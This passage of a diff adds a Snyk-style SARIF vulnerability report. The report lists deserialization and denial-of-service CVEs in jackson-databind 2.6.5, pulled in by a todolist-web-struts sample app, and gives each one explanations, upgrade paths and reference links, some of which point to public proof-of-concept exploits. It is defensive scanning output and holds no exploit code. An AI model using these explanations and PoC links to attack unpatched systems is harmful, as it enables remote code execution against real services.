`com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "CWE-918", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-12086) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36518) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2022-42004) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n# References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 5.9, + "security-severity": "5.9" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2022-42003) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n# References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 5.9, + "security-severity": "5.9" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2017-7525) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n# References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2017-15095) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-184", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2017-17485) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-5968) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n# References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2018-7489) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party 